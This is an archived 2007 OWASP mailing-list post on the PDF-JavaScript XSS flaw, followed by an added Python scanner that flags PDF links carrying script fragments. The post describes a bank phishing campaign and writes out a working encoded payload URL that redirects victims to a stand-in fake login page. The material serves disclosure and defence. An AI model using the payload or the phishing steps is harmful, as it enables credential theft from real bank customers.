[Owasp-sydney] XSS/Phishing with PDF

Jean-Jacques Halans halans at gmail.com
Wed Jan 3 17:55:13 EST 2007


Dear all,
First off: Happy New Year to all.

There's currently a lot of chatter on the securityfocus mailing list
about the pdf-javascript vulnerability disclosed by Stefano Di Paola
and Giorgio Fedon last week at 23C3 in Berlin,
making new ajaxy worms possible. Adobe did put out an Acrobat fix, but
lots of people don't often upgrade Acrobat Reader.

In my opinion, it also makes for a big phishing hole (works in Firefox
2, doesn't seem to in IE6, but other opportunities may exist; it
seems to be combinations of versions of browsers/Acrobat).
Google for any banking PDFs (for example using something like
site:abankingsite.com filetype:pdf) and attach your fake banking site
to let the user login to read the article.

For example:
Send out an email pretending to come from (for example) Citibank,
about a new article on Wealth Management, with a link to the real
article:
http://www.citibank.com/privatebank/np_on_wm.pdf#something=javascript:var%20url=%22http://www.citibank.com/privatebank/%22;var%20temp=confirm(%22Dear%20Citibank%20Customer,\n\nPlease%20login%20to%20read%20the%20article.\nAfter%20login%20you%20will%20be%20returned%20to%20the%20article.\n\n%22);var%20url2=%22http://www.somecitibankspoofurl.com/fake_login_page%22;if(temp){document.location=url2}else{document.location=url}
Notice the popup (in firefox) which says: "The page at
http://www.citibank.com says:"

PDF links regularly shouldn't really have any request parameters
attached, so for PDF requests the server might try to check on any
attached parameters and redirect the user.
Although Adobe does provide support for so-called "open parameters":
http://partners.adobe.com/public/developer/en/acrobat/PDFOpenParameters.pdf

Regards
JJ

-- 
Halans Jean-Jacques

================================
> http://www.halans.be
> http://del.icio.us/halans
================================
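The link pattern described above (a .pdf URL whose fragment carries a javascript: value instead of documented open parameters) can be flagged wherever the full URL is visible, for example in a mail link scanner, since the fragment is not part of the HTTP request the server sees. The following is an added example and not code from the original post; the domains, the open-parameter allow-list and the sample message are constructed assumptions.

```python
# Flag PDF links whose fragment (or query) smuggles a script URL.
# Added example, not from the original post; sample links are constructed.
import re
from urllib.parse import unquote, urlsplit

# A few documented Acrobat "open parameters" (page, zoom, ...). Assumption:
# this allow-list is illustrative, not Adobe's complete list.
KNOWN_OPEN_PARAMS = {"page", "zoom", "nameddest", "pagemode", "view",
                     "toolbar", "navpanes", "scrollbar", "search", "highlight"}
# A value that makes the viewer navigate to script instead of a location.
SCRIPT_SCHEME = re.compile(r"^\s*(javascript|vbscript)\s*:", re.I)
URL_IN_TEXT = re.compile(r"https?://\S+")


def classify_pdf_link(url):
    """Return (verdict, reason) with verdict in ok/suspicious/block/not-pdf."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(".pdf"):
        return "not-pdf", ""
    for where, raw in (("fragment", parts.fragment), ("query", parts.query)):
        if not raw:
            continue
        text = unquote(raw)  # payloads are usually percent-encoded (%20, %22)
        for pair in text.split("&"):
            name, _, value = pair.partition("=")
            if SCRIPT_SCHEME.match(value) or SCRIPT_SCHEME.match(name):
                return "block", f"{where} carries a script URL: {pair[:40]}"
            if where == "fragment" and name.lower() not in KNOWN_OPEN_PARAMS:
                return "suspicious", f"unknown open parameter '{name}'"
        if where == "query":
            return "suspicious", "PDF requested with query parameters"
    return "ok", "plain PDF link or documented open parameters only"


def scan_text(text):
    """Extract links from a message body and return the ones worth flagging."""
    findings = []
    for url in URL_IN_TEXT.findall(text):
        verdict, reason = classify_pdf_link(url)
        if verdict in ("suspicious", "block"):
            findings.append((url, verdict, reason))
    return findings


# Constructed sample message: placeholder domain, harmless payload.
SAMPLE_BODY = """Read the new article: http://bank.example/report.pdf#page=3
Also: http://bank.example/report.pdf#x=javascript:alert(1)
Encoded: http://bank.example/wm.pdf#a=javascript:var%20u=%22x%22;alert(u)
Not a PDF: http://bank.example/login?next=javascript:alert(1)"""

if __name__ == "__main__":
    for url, verdict, reason in scan_text(SAMPLE_BODY):
        print(verdict, url, "-", reason)
```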
